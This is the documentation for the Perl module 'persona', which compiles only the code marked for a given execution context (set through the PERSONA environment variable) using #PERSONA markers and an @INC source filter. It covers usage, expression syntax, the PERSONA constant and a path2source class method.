(and not evolving) the metaphor "And then you see them spinning their wheels because they can't map the web to Plan 9's metaphor.? " Then I probably didn't express myself clearly enough. I am all for brainstorming, brainstorming is good. It is vital. I am not saying the discussion of how to map the web to their metaphor is spinning their wheels because they had the conversation, but because they more or less stopped. They absolutely should try to map the we to their metaphor, but when they found that they couldn't; the logical thing to do — to my mind — would be to say "oh well this needs to be an exception". Because they didn't get there and just let the subject drop without any real conclusion; that (and only that) is why they say they spun their wheels. If they had subsequently implemented any form of modern web browser I wouldn't have reached the conclusion I did. But because — nearly a decade and a half later — they still haven't then I (again personally) think my conclusion is justified. My point is that metaphors only take you so far, if you can't make something needed fit, you should either make an exception or adapt your metaphor. That conversations, along with many others I have read (I have followed Plan 9 for decades now and even ran it for a bit) have made it clear to me that they are not interested in pragmatism (minor edits for formatting only) Edited 2014-02-17 17:57 UTC That might hold Plan9 back, but on the other hand having a project that pushes a specific metaphor to the limit comes handy for other more pragmatic projects to decide where such metaphor really works and where it doesn't. You are talking about mid-90ies, do you? It was released as free software in 2002, and it really wasn't much behind in any aspect, even in web browsing back then. No matter what's the intention of the dev team behind Plan 9 it can still be regarded and used as kind of a research OS by third parties. An incubator or potentially interesting implementations of the "everything is a file" metaphor, if you will. It seems likely that the reason for choosing GPLv2 was for compatibility with the Akaros project at Berkeley, which made this announcement. Ron Minnich, an experienced Plan 9 developer, recently joined Akaros. Thom, how about an article on Akaros? I don't think OSnews has covered it yet.
http://www.osnews.com/comments/27567
CC-MAIN-2015-11
refinedweb
2,664
69.62
Enable and Disable logsSanjeeva Gurram Mar 1, 2012 4:31 AM Hi Experts, we are planning to implement like the below way, if there any method or scripts to do, what is thebetter way to acive it - Scheduled job to enable logs (e.g. filter log) and wait for 10 minutes - After 10 minutes, disable the log(s) and cut and paste the log(s) at some pre-defined place - Enable the logs again after movement of the file - Repeat the same process from 1 through 3 continuously Thanks Sanjeeva Naidu G 1. Re: Enable and Disable logsDhananjay Gundre Mar 1, 2012 4:33 AM (in response to Sanjeeva Gurram) Why not to use feature of adding logs to forms and writing workflow to remove not required logs. You can use Configuration-ARDBC form to enable and disable logs. 2. Re: Enable and Disable logsSanjeeva Gurram Mar 1, 2012 4:40 AM (in response to Dhananjay Gundre) Dhanajay, U have any setps to do that, If yes plz share the setps or any document if u have Thanks Sanjeeva Naidu G 3. Re: Enable and Disable logsLaurent Matheo Mar 6, 2012 3:22 AM (in response to Sanjeeva Gurram) You could also use APIs (java for example). It should be API class LoggingInfo. Unzip file "ardoc7604_build002.jar" (should be in folder "/ARSystem/arserver/api/" it contains API help files. 4. Re: Enable and Disable logsLeonard Warren Mar 6, 2012 5:52 AM (in response to Laurent Matheo) Using the Configuration-ARDBC form to activate and deactivate log files will require you to reboot the AR System Server at some point because the changes will take place but the Developer Studio will pick up a change was made and let you know it when you log into the Studio until the reboot has taken place. It is an option but you need to understand the results of your actions as well. The utilization of Form logging is a possibility but it is a huge database resource hit. The information is being stored within your underlying database instead of your server box. Leaving the log files on continuous could cause a slowness in your system for other operations. But it is an option. The APIs is a possibility, but I have not done this set up at this time. Not sure what is the best way to approach this request. There is always a way to actions or reactions within Remedy, but for this situation, I am not sure what is the best way at this time. Lenny 5. Re: Enable and Disable logsLaurent Matheo Mar 6, 2012 9:54 AM (in response to Leonard Warren) My bad, the API I saw (setlogging) is for client side logs though perhaps it's possible with "SetServerInfo". 6. Re: Enable and Disable logsLaurent Matheo Mar 6, 2012 10:52 AM (in response to Laurent Matheo) Yeah it's working with SetServerInfo ^_^ here is a snipset from java code: import com.bmc.arsys.api.ARException; import com.bmc.arsys.api.ARServerUser; import com.bmc.arsys.api.ServerInfoMap; import com.bmc.arsys.api.Value; private ARServerUser ID_server=null; //put here some code to init server connection using ID_Server, check integration guide for a full example. ServerInfoMap MyMap = new ServerInfoMap(); Value MyValue =new Value(1); //Triggers SQL log Value MyValuePath =new Value("c:\\tmp\\logs_sql.log"); //SQL log path MyMap.clear(); MyMap.put(AR_SERVER_INFO_DEBUG_MODE, MyValue); //1=2^0=SQL MyMap.put(AR_SERVER_INFO_SQL_LOG_FILE, MyValuePath); //SQL file path try { ID_server.setServerInfo(MyMap); System.out.println("Set log ok!"); } catch (ARException e) { System.out.println("Exception Error in set_all_intel!"); return false; } You have to do the same process but set the DEBUG_MODE to 0 to deactivate the logging. 7. Re: Enable and Disable logsSanjeeva Gurram Mar 6, 2012 11:14 PM (in response to Leonard Warren) Lenny, U have any steps for this or if u have any document can u share with me it will be helpful for me Thanks Sanjeeva Naidu G 8. Re: Enable and Disable logsSriram GP Feb 5, 2013 12:09 AM (in response to Laurent Matheo) hi Laurent Matheo, i am trying to use the same java code, sql logs got enabled but, all other options got unchecked, how to check/uncheck sql log, without affecting other options? Sriram 9. Re: Enable and Disable logsLJ LongWing Feb 5, 2013 12:12 PM (in response to Sriram GP) The Debug Mode is a bitwise value, you would need to parse the value to determine if a given log is on or not, and then add the appropriate bit mask to the value, or subtract appropriate ammount to turn on/off. 10. Re: Enable and Disable logsSriram GP Feb 6, 2013 3:24 AM (in response to LJ LongWing) Thank you for the information. Sriram 11. Re: Enable and Disable logsAbhijit NameToUpdate May 15, 2013 2:24 AM (in response to Sriram GP) Guyz, We have 9 applications on same server, so taking server down is like taking all the applications down. We dont want that, we need a switch to take down just one application. Let me know if we have any such ready option in remedy. Thanks, Abhijit 12. Re: Enable and Disable logsLJ LongWing May 15, 2013 7:20 AM (in response to Abhijit NameToUpdate) You could chang the application state of just that application to maintenance and users should not be able to access it, but that is only if the app is in a deployable application 13. Re: Enable and Disable logsAbhijit NameToUpdate May 15, 2013 7:25 AM (in response to LJ LongWing) where I will get that option? 14. Re: Enable and Disable logsLJ LongWing May 15, 2013 8:41 AM (in response to Abhijit NameToUpdate) Abhijit, This is found in the form 'AR System Application State' form, but I honestly recommend you read up on the option before making any changes...
https://communities.bmc.com/message/230742
CC-MAIN-2015-14
refinedweb
984
58.32
Answer: Answer: If you are an instructor, please visit and select "Instructor Resources". You will need to fill out a form and obtain a password to see the solutions to all exercises. Answer: The following compilers should work: Answer: Your compiler (Microsoft Visual C++ 6) does not conform to the C++ standard. A remedy is to add a line namespace std {} above the using namespace std; directive. Answer: Your compiler (Microsoft Visual C++ 6) does not conform to the C++ standard. A remedy is to rename the index variable in the second loop. Answer: Your compiler (Microsoft Visual C++ 6 or g++ 2.9x) does not conform to the C++ standard. A remedy is to add the line double max(double x, double y) { if (x > y) return x; else return y; } Answer: Your compiler (g++ 2.9x) does not conform to the C++ standard. A remedy is to change #include <sstream> . . . istringstream instr(s); . . . ostringstream outstr; . . . s = outstr.str(); to #include <strstream> . . . istrstream instr(s.c_str()) . . . ostrstream outstr; . . . s = string(outstr.str()); Answer: Your compiler (g++ 2.9x) does not conform to the C++ standard. A remedy is to replace fixed with setiosflags(ios::fixed) Answer: It is not a part of the ISO standard, and some compilers don't define it. If you find it implausible that the standard doesn't define it, you can purchase an official copy or check out an inofficial working draft. Answer: (1) STL uses doubly-linked lists. (2) It is actually easier to implement insertion and deletion in a doubly-linked list. Answer: This is a book about computing concepts, not about C++. Strings are a concept. ANSI C++ supports two implementations of strings: the string class and char* pointers. There is no doubt that many C++ programmers will need to learn both implementations, but I do not believe they should learn all details of both of them in their first programming course. The string class is safe and convenient. Students master it quickly and can move on to learning more computing concepts. Answer: The <iostream> header and the std namespace were introduced in 1996 and approved in the international standard in 1998. If your compiler does not support these constructs, you will need to upgrade your compiler. g++, Borland C++ 5.5 and Microsoft Visual C++ 6 are reasonably standard compliant. Answer: Here is a list of currently supported platforms. Answer: The CCC graphics library has been purposefully kept simple so that students don't fritter away endless time with color and fancy fonts. Use wxWidgets if you want fancier graphics Answer: There are many different schemes to name accessors, mutators and data fields. The C++ library uses overloaded pairsseconds() and seconds(int) for accessors and mutators, which I think is a bit too confusing. I felt the get/set terminology makes it really clear that the accessor is a function call. And, of course, that is the convention used in Java. Answer: The standard C++ library uses no uppercase letters at all, and it uses underscores to make names more readable (bad_cast, push_back). There is nothing wrong with mixed case (getSeconds, readInt); I just wanted to be consistent.
http://www.horstmann.com/bigcpp/faq1.html
CC-MAIN-2014-15
refinedweb
528
65.62
To compile java program in iSeries you need to have JDK installed. Click here to learn how to check if Java is installed on your iSeries and what is the the Java Version? Here is a sample Java program that we will try to compile package com.as400samplecode; public class SimpleJava { public static void main(String[] args) { String firstName = args[0].trim(); String lastName = args[1].trim(); String age = args[2].trim(); System.out.println("First Name: " + firstName); System.out.println("Last Name: " + lastName); System.out.println("Age: " + age); } } Now you can create a new file called SimpleJava.java in the IFS directory of your choice or use Eclipse to create the program and then FTP it to iSeries. To compile the Java program we are going to use the command javac in Qshell To start the Qshell use command QSH and press ENTER. Once inside the QSH, next to the $ sign type cd {path_to_your_folder} and press ENTER for example cd /myName/Java, when your get the $ sign back that means execution is complete. Now to compile type javac -d {path_to_your_folder} SimpleJava.java After the Java program is compiled you will see the $ sign. Now lets run the program, type java java com.as400samplecode.SimpleJava "Albert" "Who" "35" Here is the Output First Name: Albert Last Name: Who Age: 35 $ Lets look at what the compile does it basically creates a sub directory called com underneath the {path_to_your_folder} and then underneath that is the as400samplecode directory and then the java class. This is what happens when you package Java programs using this line of code. package com.as400samplecode; Javac Command javac [ options ] [ sourcefiles ] [ @argfiles ] Arguments may be in any order. options - Command-line options. - One or more source files to be compiled (such as SimpleJava.java). - One or more files that lists options and source files. The -J options are not allowed in these files. Standard Options . The destination directory must already exist; javac will not create the destination directory.. . . NO JUNK, Please try to keep this clean and related to the topic at hand. Comments are for users to ask questions, collaborate or improve on existing.
https://www.mysamplecode.com/2011/05/iseries-compile-java-programs-beginners.html
CC-MAIN-2019-39
refinedweb
357
66.44
John Goerzen wrote: >> I'd rather have xmonad completely eat all Mod keypresses, and let no other >> application, even those Windows RDP or VirtualBox sessions, ever see it... >> Is there a quick trick to accomplish this? wagnerdm wrote: > ((0, xK_Super_L), return ()) -- make VirtualBox ignore stray hits of the > Windows key when xmonad has the active grab Great! I really need this, because I am about to start using Windows in VirtualBox on a regular bases, and I've already felt this annoyance occasionally in VNC. Thanks! This is probably something that is needed by a large proportion of xmonad users. Where can it be posted so that people will likely hear about it? I don't remember anymore how I found out how to make the Windows key my Mod key. But this important additional setting should be added there. Thanks, Yitz
http://www.haskell.org/pipermail/xmonad/2012-February/012405.html
CC-MAIN-2013-48
refinedweb
142
62.27
Shims aims to provide a convenient, bidirectional, and transparent set of conversions between scalaz and cats, covering typeclasses (e.g. Monad) and data types (e.g. \/). By that I mean, with shims, anything that has a cats.Functor instance also has a scalaz.Functor instance, and vice versa. Additionally, every convertible scalaz datatype – such as scalaz.State – has an implicitly-added asCats function, while every convertible cats datatype – such as cats.free.Free – has an implicitly-added asScalaz function. Only a single import is required to enable any and all functionality: import shims._ Toss that at the top of any files which need to work with APIs written in terms of both frameworks, and everything should behave seamlessly. You can see some examples of this in the test suite, where we run the cats laws-based property tests on scalaz instances of various typeclasses. UsageUsage Add the following to your SBT configuration: libraryDependencies += "com.codecommit" %% "shims" % "<version>" If you're using scala.js, use %%% instead. Cross-builds are available for Scala 2.11, 2.12, and 2.13. It is strongly recommended that you enable the relevant SI-2712 fix in your build if using 2.11 or 2.12. Details here. A large number of conversions will simply not work without partial unification. Note that shims generally follows epoch.major.minor versioning schemes, meaning that changes in the second component may be breaking. This is mostly because maintaining strict semver with shims would be immensely difficult due to the way the conversions interact. Shims is more of a leaf-level project, anyway, so semantic versioning is somewhat less critical here. Feel free to open an issue and make your case if you disagree, though. Once you have the dependency installed, simply add the following import to any scopes which require cats-scalaz interop: import shims._ That's it! Effect TypesEffect Types You can also use shims to bridge the gap between the older scalaz Task hierarchy and newer frameworks which assume cats-effect typeclasses and similar: libraryDependencies += "com.codecommit" %% "shims-effect" % "<version>" import shims.effect._ For more information, see the shims-effect subproject readme. Upstream DependenciesUpstream Dependencies - cats 2.0.0 - scalaz 7.2.28 At present, there is no complex build matrix of craziness to provide support for other major versions of each library. This will probably come in time, when I've become sad and jaded, and possibly when I have received a pull request for it. Quick ExampleQuick Example In this example, we build a data structure using both scalaz's IList and cats' Eval, and then we use the cats Traverse implicit syntax, which necessitates performing multiple transparent conversions. Then, at the end, we convert the cats Eval into a scalaz Trampoline using the explicit asScalaz converter. import shims._ import cats.Eval import cats.syntax.traverse._ import scalaz.{IList, Trampoline} val example: IList[Eval[Int]] = IList(Eval.now(1), Eval.now(2), Eval.now(3)) val sequenced: Eval[IList[Int]] = example.sequence val converted: Trampoline[IList[Int]] = sequenced.asScalaz ConversionsConversions TypeclassesTypeclasses Typeclass conversions are transparent, meaning that they will materialize fully implicitly without any syntactic interaction. Effectively, this means that all cats monads are scalaz monads and vice versa. What follows is an alphabetized list (in terms of cats types) of typeclasses which are bidirectionally converted. In all cases except where noted, the conversion is exactly as trivial as it seems. Alternative - Note that MonadPlusdoesn't exist in Cats. I'm not sure if this is an oversight. At present, no conversions are attempted, even when Alternativeand FlatMapare present for a given F[_]. Change my mind. Applicative Apply Arrow Choice - Requires a Bifunctor[F]in addition to a Choice[F]. This is because scalaz produces a A \/ B, while cats produces an Either[A, B]. Bifoldable Bifunctor Bitraverse Category Choice CoflatMap Comonad Compose Contravariant Distributive Eq FlatMap - Requires Bind[F]and either BindRec[F]or Applicative[F]. This is because the cats equivalent of scalaz.Bindis actually scalaz.BindRec. If an instance of BindRecis visible, it will be used to implement the tailRecMfunction. Otherwise, a stack-unsafe tailRecMwill be implemented in terms of flatMapand point. - The cats → scalaz conversion materializes scalaz.BindRec; there is no conversion which just materializes Bind. Foldable Functor InjectK - This conversion is weird, because we can materialize a cats.InjectKgiven a scalaz.Inject, but we cannot go in the other direction because scalaz.Injectis sealed. Invariant(functor) Monad - Requires Monad[F]and optionally BindRec[F]. Similar to FlatMap, this is because cats.Monadconstrains Fto define a tailRecMfunction, which may or may not be available on an arbitrary scalaz.Monad. If BindRec[F]is available, it will be used to implement tailRecM. Otherwise, a stack-unsafe tailRecMwill be implemented in terms of flatMapand point. - The cats → scalaz conversion materializes scalaz.Monad[F] with scalaz.BindRec[F], reflecting the fact that cats provides a tailRecM. MonadError - Similar requirements to Monad Monoid MonoidK Order Profunctor Representable Semigroup SemigroupK Show Strong Traverse Note that some typeclasses exist in one framework but not in the other (e.g. Group in cats, or Split in scalaz). In these cases, no conversion is attempted, though practical conversion may be achieved through more specific instances (e.g. Arrow is a subtype of Split, and Arrow will convert). And don't get me started on the whole Bind vs BindRec mess. I make no excuses for that conversion. Just trying to make things work as reasonably as possible, given the constraints of the upstream frameworks. Let me know if I missed anything! Comprehensive lists of typeclasses in either framework are hard to come by. DatatypesDatatypes Datatype conversions are explicit, meaning that users must insert syntax which triggers the conversion. In other words, there is no implicit coercion between data types: a method call is required. For example, converting between scalaz.Free and cats.free.Free is done via the following: val f1: scalaz.Free[F, A] = ??? val f2: cats.free.Free[F, A] = f1.asCats val f3: scalaz.Free[F, A] = f2.asScalaz Note that the asScalaz/ asCats mechanism is open and extensible. To enable support for converting some type "cats type" A to an equivalent "scalaz type" B, define an implicit instance of type shims.conversions.AsScalaz[A, B]. Similarly, for some "scalaz type" A to an equivalent "cats type" B, define an implicit instance of type shims.conversions.AsCats[A, B]. Thus, a pair of types, A and B, for which a bijection exists would have a single implicit instance extending AsScalaz[A, B] with AsCats[B, A] (though the machinery does not require this is handled with a single instance; the ambiguity resolution here is pretty straightforward). Wherever extra constraints are required (e.g. the various StateT conversions require a Monad[F]), the converters require the cats variant of the constraint. This should be invisible under normal circumstances since shims itself will materialize the other variant if one is available. NestingNesting At present, the asScalaz/ asCats mechanism does not recursively convert nested structures. This situation most commonly occurs with monad transformer stacks. For example: val stuff: EitherT[OptionT[Foo, ?], Errs, Int] = ??? stuff.asCats The type of the final line is cats.data.EitherT[scalaz.OptionT[Foo, ?], Errs, Int], whereas you might expect that it would be cats.data.EitherT[cats.data.OptionT[Foo, ?], Errs, Int]. It is technically possible to apply conversions in depth, though it require some extra functor constraints in places. The primary reason why this isn't done (now) is compile time performance, which would be adversely affected by the non-trivial inductive solution space. It shouldn't be too much of a hindrance in any case, since the typeclass instances for the nested type will be materialized for both scalaz and cats, and so it doesn't matter as much exactly which nominal structure is in use. It would really only matter if you had a function which explicitly expected one thing or another. The only exception to this rule is ValidationNel in scalaz and ValidatedNel in cats. Converting this composite type is a very common use case, and thus an specialized converter is defined: val v: ValidationNel[Errs, Int] = ??? v.asCats // => v2: ValidatedNel[Errs, Int] Note that the scalaz.NonEmptyList within the Validation was converted to a cats.data.NonEmptyList within the resulting Validated. In other words, under normal circumstances you will need to manually map nested structures in order to deeply convert them, but ValidationNel/ ValidatedNel will Just Work™ without any explicit induction. ContributorsContributors None of this would have been possible without some really invaluable assistance: - Guillaume Martres (@smarter), who provided the key insight into the scalacbug which was preventing the implementation of Capture(and thus, bidirectional conversions) - Christopher Davenport (@ChristopherDavenport), who contributed the bulk of shims-effect in its original form on scalaz-task-effect
https://index.scala-lang.org/djspiewak/shims/shims/1.3.0?target=_2.11
CC-MAIN-2019-43
refinedweb
1,471
50.73
Import invoices excel jobs I have couple of websites whose product database i would like to import as it is kindly visit [login to view URL] [login to view URL] .. ... Invoices automatically send to customer if order come on marketplace. Customer data must import in Prestashop. I am looking for somebody you can setup the old website. export products (3000) and categories from it and reimport them in a magento 2 environment. My budget is around 110$ ...sections to this project: Section 1: Admin section Section 2: Client Side Section 1 Admin: Once logged in there needs to be the following menu: Import Current Month || Archive Import || Suppliers IMPORT CURRENT MONTH Here we will have an upload field where the CSV file will be selected, and the date range of the CSV file must also be set here from My client has a business with both normal and online stores. He needs the stock in the online store to be automatically updated form a csv file that will be placed in a server periodically. This job requires to choose the best Prestashop 1.6 module for this task and configuring it. Placing the csv file in the server will be done by the client itself, so that part must not be included in the budget... Convert Magento product export CSV format to Shopify Product import CSV , around 6000 Products!! I have an e-commerce website and I want to import 30000 products from Taobao to my website with English translation and currency in BDT. I need someone who is already experienced in this job) In We are looking for overseas partner (s) for international trading. We also intend to set up an IT and Civil Engineering department, for that we shall be needing overseas partners to outsource their work to us. Doresc un script care sa faca import de produse dintr-un site extern intr-un site wordpress + woocommerce. ... Software Developed in CorePHP-QR CODES Integration We need a module for integrating dolibarr with whmcs, for exchanging invoices, payments etc import data into software on the cloudss Freelancers with proper written English skill only. We already uploaded our products from OBERLO, now we need someone to... import data into software on the cloud I need software developer for small help, who can modify and add import option on add member section. If you can let's discuss. Import by CSV file or any I have a problem in importing xml data. So if you have good experience with All Import plugin and Calenderize it! plugin, apply now. You will work via teamviwer on my computer. Happy bidding. Hi there.. We need someone to send us a compiled list of Export/Import data websites for major countries across the world. ONLY person who is already familiar with finding Export/Import data for various countries should apply. Thanks ! Firebase analytics import dependencies issue. Please bid only if you can work though team viewer Update website and integrate booking system with quickbooks and automated invoices. HI need to export and import product from my test site to my new site. 1. includ YIKES, Inc - Custom Product Tabs for WooCommerce 2. WooCommerce - WooCommerce Product Add-ons 3. Joomunited - WP Media folder withe all media and folder the site is in hebrew languge and the work be done ONLY!!! with teamviewer ONLY if you want to work with teamviewer Hello, I have a script that downloads pages that I'd like to improve. Would like it have fields like title, description and price. Let me know if I can provide more information, Thanks I am looking to develop a platform that would allow me to Hi I have a file and need to sort out subcategories in CSV file. - only peeople with experiences with importing via CSV .. which will generate the quote .. Hi I have installed warehouse theme with megamenu and I use total import pro. The problem is that the tree doesnt work. Need someone to help me with categories tree setup to display correctly Frelance en la distribución de repuestos automotriz Interface for Prestashop 1.7.3. data import. See attachments. .. Invoicing suppliers, office administration, purchasing manager. Prestashop 1.7.3. categories trees import. Sample of the data I have in attachment. Categories must be like Make - Model - Motor - KW - Year. I have 4.000 XML files (utf8). I want to have them in TSV (csv). Thanks.
https://www.freelancer.com/work/import-invoices-excel/
CC-MAIN-2018-22
refinedweb
734
64.41
Intro We knew from the start in writing Professional Papervision that the technology would change mid-stream. Mid-stream is here and we are delighted with the changes. And we are incorporating them into your book. Yes, expect the book to cover Gumbo (Flex 4) – and much more. I just couldn’t resist this graphic below. Is it a bird (gumby)? Is it a plane (dumbo)? No it’s Gumbo! In addition to the power of the Flash 10 player, having the open source gumbo code opens up a whole new world of development possibilities. In this tutorial, you’ill learn how to get started with Gumbo by doing the following; - Installing and configuring Gumbo - Creating your first program - Examining the Gumbo classes I’m thrilled that Gumbo is here and have already started using it to extend the possibilities of Papervision. You’ll hear much about integrating Gumbo with Papervision in future blog post. Gumbo Rotating Video Example A great place to go for Gumbo examples is Peter deHaan’s blog on Flex Examples. I’ve been reading his blog since it first came out and he does really good work in Flex – almost an example everyday. I modified his rotating image Gumbo Code and extended it to play video, and have added a discussion on how to discover what is available in Gumbo. And how to work with Gumbo’s class structure. My extended example can be accessed by clicking on the link below – remember you need the Flash 10 player to run it! You can watch the demo or download the source from the links below; Demo: Source: The Big Deal!!! So what’s the big deal? Why should you even care about Gumbo? Besides the performance enhancement and ease of use, Flex’s components are now native 3D – no more bitmapdata hacks to get them into Papervision – and if you are interested in building a Flash version of Second Life you just got a major boost. Second Life doesn’t handle data well – Flex 4 is a 3D data animal. Installing and configuring Gumbo YouTube (Part 1 Installing Gumbo – Part 2 below): Getting Started Steps (Covered in YouTube Video) All these steps are covered in the YouTube video, and they are included here so you can follow along. 1. To download Gumbo, navigate to the following URL: 2. Download the latest stable build or latest milestone – newest date. Download Adobe Flex SDK. 3. Save latest stable build to your hard drive and extract the files from the .ZIP file 4. In Flex Builder 3, select Window > Preferences from the main menu to open the Flex Builder Preferences dialog box. To add, edit, or remove a Flex SDK, select Flex > Installed Flex SDKs. 5. Click the Add button to launch the Add Flex SDK dialog box and click the Browse button to navigate to the directory where you extracted the nightly SDK build in a previous step. 6. Click OK to apply your changes and add the new Flex SDK. If you want to set the newly downloaded SDK as your default SDK, click the check box to the left of the SDK name. Click OK to dismiss this dialog. If you want to compile your code against this new SDK you can select Project > Properties from the main menu, select Flex Compiler from the menu on the left, and select your new SDK from the dropdown menu in the Flex SDK version section. Note:Make sure Flash Player 10 is selected. Also worth mentioning is that you can manage your installed SDKs via the Project Properties dialog menu by clicking the Configure Flex SDKs link, which takes you to the Installed Flex SDKs preferences. Difference Between Builds Latest Milestone Release Builds – Releases are builds that have been declared major releases by the development team – Releases are the right builds for people who want to be on a stable, tested release, and don’t need the latest greatest features and improvements Stable Builds – Stable builds have been found to be stable enough for most people to use. They are promoted from nightly build by the architecture team after they have been used for a few days and deemed reasonable. The latest stable build is the right build for people who want to stay up to date with what is going on in the latest development stream, and don’t mind putting up with a few problems in order to get the latest and greatest features and bug fixes. Nightly Builds – Nightly builds are produced every night from whatever has been released into the HEAD of the SVN repository. They are untested and may have problems. Some possibly will not work at all. Different types of Flex SDKs available: - Free Adobe Flex SDK – An official Adobe product, with released versions found at. The Adobe Flex SDK contains everything you will need to build and deploy Flex RIAs - Open Source Flex SDK – For users who want a package that contains only open source code, we offer the Open Source Flex SDK, which is available from this site. - Adobe Add-ons for Open Source Flex SDK – This package contains all of the items that are in the Adobe Flex SDK and not in the Open Source Flex SDK. Code Creation and Working with Classes (Covered in YouTube Video) YouTube Video (Part 2 Code Creation) After downloading deHaan’s example of the rotating image load it into Flex and get it working. You’ll modify his code to get a button-controlled video (play, stop, pause) instead of an image rotating. Here are the steps below; - Add the Video Display import statement import mx.controls.VideoDisplay; - Add a video1 private variable for your video private var video1:VideoDisplay - Add video play, stop, and pause buttons and include their event listeners in the initiation function fxVideoPlay =new FxButton(); fxVideoPlay.label = “Play Video”; fxVideoPlay.addEventListener(MouseEvent.CLICK, playVideo); fxVideoPause =new FxButton(); fxVideoPause.label = “Pause Video”; fxVideoPause.addEventListener(MouseEvent.CLICK, pauseVideo); fxVideoStop =new FxButton(); fxVideoStop.label = “Stop Video”; fxVideoStop.addEventListener(MouseEvent.CLICK, stopVideo); - Add the buttons to the VGroup vGroup.addItem(fxVideoPlay); vGroup.addItem(fxVideoPause); vGroup.addItem(fxVideoStop); - Instantiate the Video Display, add its source, position, style, and add to the stage video1 = new VideoDisplay(); video1.source=”assets/abc7listens.flv”; video1.width=320; video1.height=240; video1.autoPlay=true; video1.setStyle(“horizontalCenter”, 0); video1.setStyle(“verticalCenter”, 0); addItem(video1); - Finally add the play, pause, and stop button function for your listeners private function playVideo(evt:MouseEvent):void { video1.play(); } private function pauseVideo(evt:MouseEvent):void { video1.pause(); } private function stopVideo(evt:MouseEvent):void { video1.stop(); } - And that’s it! To see the code click the more button below. Read the rest of this entry »
https://professionalpapervision.wordpress.com/2008/11/
CC-MAIN-2016-18
refinedweb
1,120
62.98
persona - control which code will be loaded for an execution context $ PERSONA=cron perl foo.pl foo.pl ================= use persona only_for => '*'; # all modules, maybe regex use Foo; Foo.pm ================= package Foo; # code to be compiled always #PERSONA cron || app || book # code to be compiled only for the "cron", "app" and "book" personas #PERSONA # code to be compiled always #PERSONA !cron # code to be compiled for all personas except "cron" #PERSONA !( app || book ) # code to be compiled for all personas except "app" and "book" my $limit = PERSONA eq 'app' ? 100 : 10; # code using the constant This documentation describes version 0.12. This module was born out of the need to be able to easily specify which subroutines of a module should be available (as in "compiled") in different sets of mod_perl environments (e.g. the visitors front end web servers, or the personnel's back-office web servers). This both from a memory, database and CPU usage point of view, as well as from the viewpoint of security. This is most useful when using a database abstraction layer such as Class::DBI or DBIx::Class, where all of the code pertaining to an object is located in one file, while only parts of the code are actually needed (or wanted) on specific execution contexts. By specifying an environment variable, by default PERSONA, it is possible to indicate the persona for which the source code should be compiled. Any modules that are indicated to support persona dependent code will then be checked for existence of persona conditional markers, and any code that is after a persona marker that does not match the currently selected persona, will be discarded during compilation. Most likely, not all modules that you load need to be checked for persona specific code. Therefor you must indicate which modules you want this check to be performed for. This can be done with the only_for parameter when loading the persona module: use persona only_for => 'Foo'; will check all files that start with Foo, such as: Foo.pm FooBar.pm Foo/Bar.pm but not: Bar.pm You can also specify a regular expression that way: use persona only_for => qr/^(?:Foo|Bar)\.pm$/; will only check the Foo.pm and Bar.pm files. Usually the modules of a certain context that you want checked, share a common prefix. It is then usually easier to specify the setting on the command line: $ PERSONA=cron perl -Mpersona=only_for,Foo script.pl would execute the script script.pl for the persona cron and have all modules that start with Foo checked for persona dependent code. Only code that is to be included for all personas, or specifically for the cron persona, will be compiled. Suppose we want to have a method override_access available only for the backoffice persona. This can be done this way: #PERSONA backoffice sub override_access { # only for the back office persona # code... } #PERSONA sub has_access { # for all personas # code... } It is also possible to have code compiled for all personas except a specific one: #PERSONA !cron sub not_for_cron { # code... } #PERSONA would make the subroutine not_for_cron available for personas except cron. It is also possible to have code compiled for a set of personas: #PERSONA cron || backoffice sub for_cron_and_backoffice { # code... } #PERSONA would make the subroutine for_cron_and_backoffice available for the personas cron and backoffice. Or it is possible to have code compiled for all personas except for a set of personas: #PERSONA !( app || book ) sub not_for_app_or_book { # code... } would make the subroutine C<not_for_app_or_book> available for all personas B<except> C<app> and C<book>. Basically any valid expression consisting of \\w \\s ( ) ! || is allowed: if that expression yields a true value, then that code will be compiled. If you're lazy, and you don't care about any overhead while compiling code, you can indicate that you want all modules checked for PERSONA specific code by specifying '*' as the indication of which files should be checked. use persona only_for => '*'; If you want to specify multiple conditions, you can specify only_for more than once: use persona only_for => 'Foo', only_for => 'Bar'; To facilitate more complex persona dependencies, all namespaces seen by this module automatically have the constant PERSONA imported into it. This allows the constant to be used in actual code (which will then be optimized away by the Perl compiler so that the code that shouldn't be compiled for that persona, really isn't available for execution in the end). If you want to make sure that the use of the PERSONA constant in a file will not break code when using strict (which you should!), you can add: use strict; use persona; # compilation error without this print "Running code for persona " . PERSONA . "\n" if PERSONA; in that file. That will export the PERSONA constant, even when it is not set. Another example from Class::DBI / DBIx::Class:: __PACKAGE__->columns( All => ( PERSONA eq 'backoffice' ? @all : @subset ) ); which will only use all columns when executing as the backoffice persona. Otherwise only a subset of columns will be available. In order to be able to easily support operating systems that have shells that do not support easy setting of environment variables on the command line, you can also specify the persona from the command line while loading this module: $ perl -Mpersona=cron bar.pl will run set the persona to "cron". This can also be combined with other parameters, such as: $ perl -Mpersona=only_for,*,persona,cron bar.pl would process all files loaded for the cron persona. Alternately, the same is possible in source: use persona 'cron'; would select the cron persona, but only if no other persona was selected before. The test-suite contains some examples. More to be added as time permits. When the import class method of persona is first called, it looks at whether there is a ENV_PERSONA environment variable is specified. If it is, its value is used as the name of the environment variable to check for the value to be assigned to the persona. If the ENV_PERSONA environment variable is not found, PERSONA will be assumed for the name to check. If there is a non-empty persona value specified, then an @INC handler is installed. This handler is offered each file that is required or used from that moment onward. If it is not a file that should be checked for persona conditional code, it is given back to the normal require handling. If the import method determines it is being called from a script that is being called from the command line, it will do the script and then exit. This causes the script itself be called with require, and thus be handled by the @INC handler we installed. If it is a file that should be checked, it is searched in the @INC array. If found, it is opened and all the lines that should be part of the code for the current persona, are added to an in-memory buffer. Then a memory file handle is opened on that buffer and returned for normal require handling. To make sure that any errors or stack traces show the right line numbers, appropriate #line directives are added to the source being offered to the perl compilation process. Please do: perldoc -f require for more information about @INC handlers. Some class methods are provided as building bricks for more advanced usage of the persona functionality. my $source_ref = persona->path2source($path); # current persona my ( $source_ref, $skipped ) = persona->path2source( $path, $persona ); Process the file given by the absolute path name for the given persona. Assume the current process' persona if none given. Returns a reference to the scalar containing the processed source, or undef if the file could not be opened. Optionally also returns the number of lines in the original source that were skipped. This functionality is specifically handy for deployment procedures where source files are pre-processed for execution in their intended context, rather than doing this at compilation time each time. This removes the need for having this module installed in production environments and reduces possible problems with wrong persona settings in an execution context. (none) If you want to find out how this module is appreciated by other people, please check out this module's rating at (if there are any ratings for this module). If you like this module, or otherwise would like to have your opinion known, you can add your rating of this module at. Inspired by the function of load and ifdef modules from the same author. And thanks to the 